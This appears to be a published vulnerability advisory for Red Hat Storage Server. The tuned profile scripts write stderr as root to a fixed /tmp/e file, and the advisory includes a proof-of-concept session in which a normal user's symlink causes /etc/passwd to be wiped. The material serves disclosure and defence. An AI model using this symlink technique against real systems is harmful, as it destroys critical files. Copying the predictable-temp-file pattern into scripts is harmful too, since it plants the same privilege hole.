First published: Sat Jul 20 2013
Gowrishankar Rajaiyan (grajaiya) reports:

I found a potential security issue with redhat-storage-server-1.7.3-2.el6rhs.noarch (previously known as appliance-base-1.7.3-1.el6rhs) while verifying https://bugzilla.redhat.com/show_bug.cgi?id=910566. This issue also exists in the latest released version of RHS: https://rhn.redhat.com/rhn/software/channel/downloads/Download.do?cid=14689

Description:

As part of /etc/tune-profiles/rhs-high-throughput/ktune.sh and /etc/tune-profiles/rhs-virtualization/ktune.sh:

```
<snip>
for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
</snip>
```

A file "e" is created in the /tmp directory. This information is public at https://bugzilla.redhat.com/show_bug.cgi?id=910566#c13 (I set it to private now, not sure if that helps). So any normal user can create a softlink from /tmp/e to /etc/passwd. The tuned profiles are executed as the root user, hence this exposes a security loophole wherein a normal user can wipe out /etc/passwd. Please guide on how to proceed from here.

A demonstration is as follows:

As normal user:

```
[shanks@localhost ~]$ id
uid=500(shanks) gid=500(shanks) groups=500(shanks)
[shanks@localhost ~]$ cd /tmp/
[shanks@localhost tmp]$ ln -s /etc/passwd e
[shanks@localhost tmp]$ ls -l
total 4
lrwxrwxrwx  1 shanks shanks  11 Jul 19 12:49 e -> /etc/passwd
-rwx------. 1 root   root   391 Jul 19 09:04 ks-script-QuMjt3
-rwxr-xr-x. 1 root   root     0 Jul 19 09:04 ks-script-QuMjt3.log
-rw-------  1 root   root     0 Jul 19 09:04 tmp.ta4401DZd7
-rw-------. 1 root   root     0 Jul 19 08:54 yum.log
[shanks@localhost tmp]$
```

As root:

```
[root@localhost ~]# tuned-adm profile rhs-high-throughput
Reverting to saved sysctl settings:                                         [  OK  ]
Calling '/etc/ktune.d/tunedadm.sh stop': setting readahead to 128 on brick devices: [  OK  ]
Reverting to cfq elevator: dm-0 dm-1                                        [  OK  ]
Stopping tuned:                                                             [  OK  ]
Switching to profile 'rhs-high-throughput'
Applying ktune sysctl settings:
/etc/ktune.d/tunedadm.conf:                                                 [  OK  ]
Calling '/etc/ktune.d/tunedadm.sh start': setting readahead to 65536 on brick devices: [  OK  ]
Applying sysctl settings from /etc/sysctl.conf
Applying deadline elevator: dm-0 dm-1                                       [  OK  ]
Starting tuned: 'import site' failed; use -v for traceback                  [  OK  ]
[root@localhost ~]# cat /etc/passwd
[root@localhost ~]#
```
Credit: secalert@redhat.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| Red Hat Storage Server | =2.0 | |